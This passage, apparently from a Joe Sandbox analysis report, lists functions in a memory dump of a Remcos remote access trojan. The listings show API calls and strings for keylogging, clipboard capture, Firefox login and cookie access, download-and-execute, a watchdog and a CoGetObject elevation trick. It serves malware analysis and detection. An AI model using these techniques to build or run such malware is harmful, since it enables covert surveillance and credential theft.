                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
                                                                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                  • String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                                                                  • API String ID: 1067849700-718893278
                                                                                                  • Opcode ID: 1308cfd422c38a7f865df285c782d255351df4e6314e58d7a0cb0721fc13edb9
                                                                                                  • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                                                                                  • Opcode Fuzzy Hash: 1308cfd422c38a7f865df285c782d255351df4e6314e58d7a0cb0721fc13edb9
                                                                                                  • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                                                                                  Function 00412132 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                  • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
                                                                                                  • API String ID: 3018269243-1913798818
                                                                                                  • Opcode ID: 15801d91c20ef900e9e0f8d2e3d2d0a433a93230ec9322547cf40bb3c304793e
                                                                                                  • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                                                                                  • Opcode Fuzzy Hash: 15801d91c20ef900e9e0f8d2e3d2d0a433a93230ec9322547cf40bb3c304793e
                                                                                                  • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                                                                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                  • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                  • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenClipboard.USER32 ref: 004168FD
                                                                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 3520204547-604454484
                                                                                                  • Opcode ID: f98e19e59eea15a91d3b71fa0c0f5b928df445f0179be6eeee7715d264c86d8b
                                                                                                  • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                                                                                  • Opcode Fuzzy Hash: f98e19e59eea15a91d3b71fa0c0f5b928df445f0179be6eeee7715d264c86d8b
                                                                                                  • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                  • API String ID: 3527384056-432212279
                                                                                                  • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                  • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                  Function 0040F4AF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 210processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$RG
                                                                                                  • API String ID: 3756808967-4270599879
                                                                                                  • Opcode ID: 3acc3f55b6397cee36b7d5ef666cd78527c930f9b8fa3a8dd2be36fd150b4bf2
                                                                                                  • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                                                                                  • Opcode Fuzzy Hash: 3acc3f55b6397cee36b7d5ef666cd78527c930f9b8fa3a8dd2be36fd150b4bf2
                                                                                                  • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                  Function 00419662 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                                                  • API String ID: 0-3177665633
                                                                                                  • Opcode ID: 8290dbae049be2cdd206d8bf1c1fda6425e159576a2ff2ba4f12e613f6a6ac2b
                                                                                                  • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                                                                                  • Opcode Fuzzy Hash: 8290dbae049be2cdd206d8bf1c1fda6425e159576a2ff2ba4f12e613f6a6ac2b
                                                                                                  • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                  Function 0040A41B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112keyboardthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0040A451
                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                  • GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                  • String ID: (kG
                                                                                                  • API String ID: 1888522110-2813241365
                                                                                                  • Opcode ID: 31ed79bda99ad10420f5864c73503205d5e880a6a674e4152aa1d5376154a4ca
                                                                                                  • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                                                                                  • Opcode Fuzzy Hash: 31ed79bda99ad10420f5864c73503205d5e880a6a674e4152aa1d5376154a4ca
                                                                                                  • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                                                                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0040755C
                                                                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object_wcslen
                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                  • API String ID: 240030777-3166923314
                                                                                                  • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                  • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3587775597-0
                                                                                                  • Opcode ID: ed2a484c9de4d8d7b702438badeb3b089465d79b2546f7b6bce90e1470cac3ef
                                                                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                  • Opcode Fuzzy Hash: ed2a484c9de4d8d7b702438badeb3b089465d79b2546f7b6bce90e1470cac3ef
                                                                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                  • API String ID: 1164774033-405221262
                                                                                                  • Opcode ID: 5569ca3f5fbe7e4717efef4f34d69c98aa921a880cb4824fcc99a8611b97b131
                                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                  • Opcode Fuzzy Hash: 5569ca3f5fbe7e4717efef4f34d69c98aa921a880cb4824fcc99a8611b97b131
                                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EF0,?), ref: 0041C41F
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C42C
                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00474EF0,?), ref: 0041C44D
                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C473
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 2341273852-0
                                                                                                  • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                  • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                  Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                  Strings
                                                                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                  • API String ID: 3219506041-952744263
                                                                                                  • Opcode ID: f6438d0ece582153da91c0d5bff560373b785e456ae076c588142eaef4cdec3b
                                                                                                  • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                  • Opcode Fuzzy Hash: f6438d0ece582153da91c0d5bff560373b785e456ae076c588142eaef4cdec3b
                                                                                                  • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
                                                                                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                  • API String ID: 2127411465-314212984
                                                                                                  • Opcode ID: f055ea799f88ac1a9188829ac7374e5e5a6c447f9263e09deb5da0b33bdbcfb9
                                                                                                  • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                                                                                  • Opcode Fuzzy Hash: f055ea799f88ac1a9188829ac7374e5e5a6c447f9263e09deb5da0b33bdbcfb9
                                                                                                  • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                                                                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                  • API String ID: 1589313981-2876530381
                                                                                                  • Opcode ID: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
                                                                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                  • Opcode Fuzzy Hash: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
                                                                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                  Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                                                                    • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                                                                    • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
